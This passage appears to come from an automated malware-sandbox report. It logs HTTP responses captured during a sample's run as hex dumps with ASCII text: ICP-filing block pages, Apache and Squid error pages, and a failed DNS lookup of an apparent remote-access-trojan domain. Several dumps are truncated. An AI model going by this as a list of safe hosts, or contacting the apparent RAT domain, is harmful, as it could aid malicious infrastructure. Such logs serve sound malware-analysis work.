content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 02:30:41 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:41 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 02:30:41 GMTContent-Length: 69Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 73 65 72 76 65 72 20 6d 69 73 62 65 68 61 76 69 6e 67 0a Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:41 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></htmlData Raw: Data Ascii:
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Mon, 11 Mar 2024 02:30:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 